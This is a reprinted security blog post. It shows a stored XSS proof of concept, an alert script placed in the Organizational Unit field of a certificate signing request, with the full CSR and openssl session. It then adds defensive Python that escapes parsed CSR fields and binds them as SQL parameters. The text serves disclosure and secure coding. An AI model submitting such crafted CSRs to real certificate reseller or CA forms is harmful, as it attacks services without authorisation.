SSL / TLS certificates XSS

Every web application developer knows never to trust what a web application's users submit. But what if you don't know what they are submitting?

While investigating some form fields in an application, I came across a form used to check the Certificate Signing Request (CSR) you need in order to order an SSL/TLS certificate.

A certificate signing request is an encoded file containing the information needed to apply for a certificate from a certificate authority (CA) or from one of that CA's resellers. You have to create this file yourself and fill in the required information.

So you can also put something like this into it:

<script>alert('attacked')</script>

And if the reseller or CA stores the information from the CSR in a SQL database for later use, SQL injection may be possible as well.

So let me show you some examples.

This is the CSR I used in all cases:

-----BEGIN CERTIFICATE REQUEST-----
MIICzjCCAbYCAQAwgYgxCzAJBgNVBAYTAk5MMRAwDgYDVQQIDAdVdHJlY2h0MRAw
DgYDVQQHDAdVdHJlY2h0MRIwEAYDVQQKDAlOdzRhbGwgQlYxKzApBgNVBAsMIjxz
Y3JpcHQ+YWxlcnQoJ2F0dGFja2VkJyk8L3NjcmlwdD4xFDASBgNVBAMMC3d3dy5v
Y3NyLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3UpBMvJ8Cc1N
FoTI083bzoXhVXaPxN4M/gqWZYSs7RCfkYyAwabLzw9zQeybUa1SXmvAcQjvfsYe
LJvZpHlY6XIbgaS8JXu5WCkYS6nTN5TDwzghNfCHRA65s47uEuVrXq6P5/Xm9ETp
v9yLTBzAL7sci/6oGq/7qKHfuypG08TRhj/GRraA67ZuDbw6u8uMB2YzTbkgxsDM
YUgamCLeLq39wLQNE4a+fWaxbp2XME30hRXONGI/yYDjavwNl6fXJ1A4fMktzzJd
bsQRVRAyEu04Aw48d8NAN1EDkUBBTneRRWMXWO9bfHSPLK+9E/6ntJu63P8I4llk
IR+hFU0uaQIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAA3QbR9+mxgR9socp21l
WWAQCA5D+JWs8yO3QfXZA4+3IAlqQtKEyz8j0Mncra7yI9QGasnTlnbOPIASb3WY
No/5GlWxzoMivSRHSBUHhg+gly1ZcpPsgKf37aYNFxOX40Fwr3rUSRPDiqx35eQ0
ECY/1GiPyOqH3t6ck41A1Y+d4WCHHI6g6QJp1ZGS98aDRxel4yaJRGqJf1NKMrqE
OScbogqLjD9XnrnTK1dUGUPKx0hpJ5EyYmSmweAxmE6AfffVw/+8QUbnMxyD0j8j
sUy/bACF0UCwBntRzZ17aZ8WHRq3zKeA3y3s/zU7JKS4ZJjP2rD3dGAIeSPN/nHv
9tI=
-----END CERTIFICATE REQUEST-----

You can check its contents here:

https://cryptoreport.websecurity.symantec.com/checker/views/csrCheck.jsp

How did I create the certificate signing request? Simple, just like any other:

sebastian@blade:~$ openssl req -utf8 -nodes -sha256 -newkey rsa:2048 -keyout private2.key -out cert2.csr
Generating a 2048 bit RSA private key
............................+++
.+++
writing new private key to 'private2.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:NL
State or Province Name (full name) [Some-State]:Utrecht
Locality Name (eg, city) []:Utrecht
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Nw4all BV
Organizational Unit Name (eg, section) []:<script>alert('attacked')</script>
Common Name (e.g. server FQDN or YOUR name) []:www.ocsr.nl
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

sebastian@blade:~$

So, don't only check your input; also check the result that ends up being shown on screen.
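To make the defensive side of this concrete, here is an added example (my code, not the author's and not the code of any CSR checker or reseller). It parses the subject attributes out of the CSR shown above with nothing but the Python standard library, escapes every value before rendering it as HTML, and stores the values with a parameterized query, which covers both the SQL injection remark and the conclusion about checking what is shown on screen. The OID table, the function names and the table markup are my own assumptions; a production service would use a real X.509 library instead of a hand-rolled DER walker, but the escaping and parameterization are the point.

```python
import base64
import html
import re
import sqlite3

# The CSR from the post above (the OU field contains a <script> tag).
CSR_PEM = """-----BEGIN CERTIFICATE REQUEST-----
MIICzjCCAbYCAQAwgYgxCzAJBgNVBAYTAk5MMRAwDgYDVQQIDAdVdHJlY2h0MRAw
DgYDVQQHDAdVdHJlY2h0MRIwEAYDVQQKDAlOdzRhbGwgQlYxKzApBgNVBAsMIjxz
Y3JpcHQ+YWxlcnQoJ2F0dGFja2VkJyk8L3NjcmlwdD4xFDASBgNVBAMMC3d3dy5v
Y3NyLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3UpBMvJ8Cc1N
FoTI083bzoXhVXaPxN4M/gqWZYSs7RCfkYyAwabLzw9zQeybUa1SXmvAcQjvfsYe
LJvZpHlY6XIbgaS8JXu5WCkYS6nTN5TDwzghNfCHRA65s47uEuVrXq6P5/Xm9ETp
v9yLTBzAL7sci/6oGq/7qKHfuypG08TRhj/GRraA67ZuDbw6u8uMB2YzTbkgxsDM
YUgamCLeLq39wLQNE4a+fWaxbp2XME30hRXONGI/yYDjavwNl6fXJ1A4fMktzzJd
bsQRVRAyEu04Aw48d8NAN1EDkUBBTneRRWMXWO9bfHSPLK+9E/6ntJu63P8I4llk
IR+hFU0uaQIDAQABoAAwDQYJKoZIhvcNAQELBQADggEBAA3QbR9+mxgR9socp21l
WWAQCA5D+JWs8yO3QfXZA4+3IAlqQtKEyz8j0Mncra7yI9QGasnTlnbOPIASb3WY
No/5GlWxzoMivSRHSBUHhg+gly1ZcpPsgKf37aYNFxOX40Fwr3rUSRPDiqx35eQ0
ECY/1GiPyOqH3t6ck41A1Y+d4WCHHI6g6QJp1ZGS98aDRxel4yaJRGqJf1NKMrqE
OScbogqLjD9XnrnTK1dUGUPKx0hpJ5EyYmSmweAxmE6AfffVw/+8QUbnMxyD0j8j
sUy/bACF0UCwBntRzZ17aZ8WHRq3zKeA3y3s/zU7JKS4ZJjP2rD3dGAIeSPN/nHv
9tI=
-----END CERTIFICATE REQUEST-----"""

# Assumed subset of X.520 attribute OIDs; unknown OIDs fall back to dotted form.
OID_NAMES = {
    "2.5.4.6": "C", "2.5.4.8": "ST", "2.5.4.7": "L",
    "2.5.4.10": "O", "2.5.4.11": "OU", "2.5.4.3": "CN",
    "1.2.840.113549.1.9.1": "emailAddress",
}


def pem_to_der(pem):
    """Strip the PEM armour and base64-decode the DER body."""
    body = re.sub(r"-----[^-]+-----", "", pem)
    return base64.b64decode("".join(body.split()))


def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the DER element starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def iter_children(value):
    """Yield (tag, value) for each element inside a constructed DER value."""
    pos = 0
    while pos < len(value):
        tag, inner, pos = read_tlv(value, pos)
        yield tag, inner


def decode_oid(raw):
    """Decode a DER OBJECT IDENTIFIER body into dotted notation."""
    parts, acc = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(acc)
            acc = 0
    return ".".join(map(str, parts))


def csr_subject(pem):
    """Return the subject of a PKCS#10 CSR as a list of (attribute, value) pairs."""
    _, cert_req, _ = read_tlv(pem_to_der(pem), 0)       # CertificationRequest
    _, info, _ = read_tlv(cert_req, 0)                   # certificationRequestInfo
    subject = list(iter_children(info))[1][1]            # version, subject, spki, attrs
    attrs = []
    for _, rdn in iter_children(subject):                # RDN = SET OF AttributeTypeAndValue
        for _, atv in iter_children(rdn):
            (_, oid), (_, val) = list(iter_children(atv))
            name = OID_NAMES.get(decode_oid(oid), decode_oid(oid))
            attrs.append((name, val.decode("utf-8", "replace")))   # values are untrusted text
    return attrs


def render_subject_html(attrs):
    """Render the subject as an HTML table; every value is escaped, never trusted."""
    rows = "".join(
        f"<tr><td>{html.escape(n)}</td><td>{html.escape(v)}</td></tr>" for n, v in attrs)
    return f"<table>{rows}</table>"


def store_subject(attrs, db_path=":memory:"):
    """Store the values with bound parameters so they are never spliced into SQL text."""
    conn = sqlite3.connect(db_path)
    conn.execute("CREATE TABLE IF NOT EXISTS csr_subject (name TEXT, value TEXT)")
    conn.executemany("INSERT INTO csr_subject (name, value) VALUES (?, ?)", attrs)
    return conn.execute("SELECT value FROM csr_subject WHERE name = ?", ("OU",)).fetchone()[0]


if __name__ == "__main__":
    subject = csr_subject(CSR_PEM)
    print(render_subject_html(subject))
    print("stored OU:", store_subject(subject))
```

Run it and the OU shows up in the output as `&lt;script&gt;alert(&#x27;attacked&#x27;)&lt;/script&gt;`, which a browser displays literally instead of executing. The same escaping applies to every field, not only OU: the CN and O fields are just as free-form, and the author's remark about SQL is handled by binding the values as parameters rather than by any filtering of the CSR itself.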

Please credit the source when reprinting: https://www.freearoot.com/index.php/ssl-tls-certificates-xss.html

Reprinted from: https://binaryfigments.com/2017/09/28/xss-in-a-certificate-signing-request/
